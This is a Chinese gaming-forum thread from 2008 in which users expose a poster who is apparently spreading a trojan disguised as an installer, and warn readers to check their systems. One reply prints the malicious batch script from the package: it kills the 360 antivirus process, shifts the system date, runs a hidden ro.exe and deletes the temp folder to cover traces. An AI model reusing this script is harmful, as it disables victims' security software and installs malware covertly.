是不是试试就知道了
**** 作者被禁止或删除 内容自动屏蔽 **** 狠可疑.注意下他注册日期与那些顶的人风格.都像同一个人.更可疑的是.为什么不发视频地址.而是安装包.. [quote]原帖由 [i]DABOWE[/i] 于 2008-5-30 18:57 发表 [url=http://bbs.rohome.net/redirect.php?goto=findpost&pid=9202110&ptid=897455][img]http://bbs.rohome.net/images/common/back.gif[/img][/url]
下载尝试过了~没有病毒提示~但点击后出现非法进程~注册表非法篡改(异常)…应该是加过伪装壳的木马吧…… [/quote]
嗯 发的当然是木马了
没事发病毒干嘛?损人不利己
大哥不懂别乱说
**** 作者被禁止或删除 内容自动屏蔽 **** [quote]原帖由 [i]aiya903[/i] 于 2008-5-30 18:58 发表 [url=http://bbs.rohome.net/redirect.php?goto=findpost&pid=9202114&ptid=897455][img]http://bbs.rohome.net/images/common/back.gif[/img][/url]狠可疑.注意下他注册日期与那些顶的人风格.都像同一个人.
更可疑的是.为什么不发视频地址.而是安装包.. [/quote]
看他说的那方法就知道是骗人的了
更何况说了方法了还需要什么录象
录象能看出什么?
看出数字么 楼主太油菜了,不去四川抗灾浪费人才 [555] [color=DarkOrange]偶是小白鼠……[/color] **** 作者被禁止或删除 内容自动屏蔽 **** @ECHO OFF
taskkill /f /im 360tray.exe
set date=%date%
date 2100-08-22
date 2100-08-22
::========倒计时等待15秒======================
@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
set /a i = 15
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %temp%.\tmp$$$.vbs
goto Timeout
goto End
::===========倒计时等待结束后运行=============
:Next
%systemroot%\temp\ro.exe
for %%f in (%temp%.\tmp$$$.vbs*) do del %%f
::======恢复时间=======================
date 2008-5-30 aaa
date %date% aaa
::=========清除痕迹============================
RD /S /Q %systemroot%\temp\
以上为软件内容列举
楼主不要以为这里的人都是傻子…… :wub: EXE加多数小马甲顶
楼主你都大家都和你一样是脑弱么 各位有运行过楼主发的东西的,请检查自己的系统。
页:
1
[2]